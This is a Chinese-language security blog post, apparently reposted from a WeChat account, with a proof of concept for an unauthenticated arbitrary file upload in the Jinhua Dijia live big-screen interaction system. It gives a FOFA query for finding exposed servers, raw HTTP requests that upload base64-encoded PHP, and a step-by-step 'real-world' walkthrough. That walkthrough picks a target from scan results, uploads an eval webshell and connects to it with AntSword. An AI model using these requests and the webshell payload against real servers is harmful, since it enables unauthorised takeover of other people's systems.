金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

admin 2024年11月3日22:26:20评论27 views字数 1432阅读4分46秒阅读模式
金华迪加 现场大屏互动系统任意文件上传漏洞 PoC
产品简介

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

金华迪加现场大屏互动系统是一种集成了先进技术和创意设计的互动展示解决方案,旨在通过大屏幕和多种交互方式,为观众提供沉浸式的互动体验。该系统广泛应用于各类活动、展览、会议等场合,能够显著提升现场氛围和参与者的体验感。

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC
漏洞概述

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

金华迪加 现场大屏互动系统 mobile.do.php 存在任意 文件上传漏洞Q未经身份验证远程攻击者可利用该漏洞代码执行,写入WebShell进-步控制服务器权限。

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC
FOFA

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC
body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC
漏洞复现

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC
POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection: closefiletype=php&imgbase64=PD9waHAgcGhwaW5mbygpO3VubGluayhfX0ZJTEVfXyk7Pz4=

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

回显了完整路径,验证

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

如果没有真实的环境和深入的手法,我估计你们也很难理解,来吧,小龙带你们整

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC
实战复现

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

1、利用poc检测出来之后挑选天选之子

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

 2、然后先验证一波

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

3、成功验证之后,我们直接尝试拿shell,放入EXP

EXP:POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 59filetype=php&imgbase64=PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

4、蚁剑尝试连接

蚁剑尝试连接

http://x.x.x.x//data//pic//pic_173055151445329.php

金华迪加 现场大屏互动系统任意文件上传漏洞 PoC

原文始发于微信公众号(暗影网安实验室):【深度复现】金华迪加 现场大屏互动系统任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月3日22:26:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金华迪加 现场大屏互动系统任意文件上传漏洞 PoChttps://cn-sec.com/archives/3350471.html

发表评论

匿名网友 填写信息